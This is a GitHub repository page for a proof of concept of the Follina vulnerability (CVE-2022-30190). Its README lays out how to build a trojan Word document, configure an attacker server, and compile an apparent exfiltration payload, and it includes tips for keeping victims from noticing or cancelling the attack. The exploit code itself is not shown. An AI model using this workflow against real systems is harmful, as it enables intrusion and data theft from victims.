Skip to content

winstxnhdw/CVE-2022-30190

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

40 Commits

.github

.github

 
 

LocalEXF

LocalEXF

 
 

build

build

 
 

server

server

 
 

.gitignore

.gitignore

 
 

README.md

README.md

 
 

config.xml

config.xml

 
 

destroy_all.bat

destroy_all.bat

 
 

init.py

init.py

 
 

Repository files navigation

CVE-2022-30190 (Follina)

build.yml dependabot.yml

A proof of concept (PoC) for CVE-2022-30190 (Follina).

Requirements

Victim

  • Windows 10 21H1 (equivalent/earlier)
  • Security update KB5016616 uninstalled

Attacker

Configuration

Edit config.xml to modify the attacker's server hostname and port number.

<host>
  <name>{ hostname }</name>
  <port>{ port }</port>
</host>

Usage

Trojan

The following Python script will build the trojan.docx file and initialise the attacker's server.

python init.py

Payload

Build the payload and remove all unnecessary binaries with the following.

dotnet publish LocalEXF

Clean

Run the following batch script to permanently delete this directory and everything in it.

.\destroy_all.bat

Important Notes

  • To execute complex PowerShell commands, like this PoC, these commands must be Base64 encoded.

  • index.html must contain at least 4096 bytes of data within the <script> tag.

  • All arguments must be used as described within href.txt.

  • Microsoft Word cannot use the index.html file to execute JavaScript. But for whatever reason, location.href works.

  • For commands that invoke long running tasks, a troubleshooter will appear when the victim loads the document. The victim can inadvertently deny the attack by cancelling the troubleshooter. Ensure that the command runtime is short.

About

A proof of concept for CVE-2022-30190 (Follina).

Topics

trojan remote-code-execution cve-2021-40444 follina msdt

Resources

Readme
Activity

Stars

2 stars

Watchers

2 watching

Forks

2 forks
Report repository

Contributors 2

  •  
  •  

Languages